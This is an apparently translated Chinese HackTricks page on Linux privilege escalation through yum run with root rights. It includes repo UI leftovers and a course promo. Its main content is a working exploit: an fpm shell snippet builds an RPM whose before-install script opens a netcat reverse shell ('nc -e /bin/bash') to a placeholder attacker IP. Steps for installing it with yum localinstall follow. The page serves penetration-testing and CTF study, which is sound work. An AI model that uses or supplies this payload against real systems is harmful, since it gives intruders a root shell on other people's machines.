hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

2.5 KiB
Raw Blame History

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式

gtfobins上还可以找到有关yum的更多示例。

通过RPM软件包执行任意命令

检查环境

为了利用这个向量用户必须能够以更高权限的用户即root身份执行yum命令。

这个向量的一个工作示例

这个漏洞的一个工作示例可以在tryhackmedaily bugle房间中找到。

打包一个RPM

在接下来的部分中,我将介绍如何使用fpm将一个反向shell打包到一个RPM中。

下面的示例创建了一个包其中包含一个带有任意脚本的before-install触发器攻击者可以自行定义。安装时此软件包将执行任意命令。我使用了一个简单的反向netcat shell示例进行演示但可以根据需要进行更改。

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

获取shell

使用上述示例,假设yum可以作为一个具有更高权限的用户执行。

  1. 传输rpm到主机
  2. 在本地主机上启动监听器,例如示例netcat监听器
  3. 安装受影响的软件包yum localinstall -y exploited-1.0-1.noarch.rpm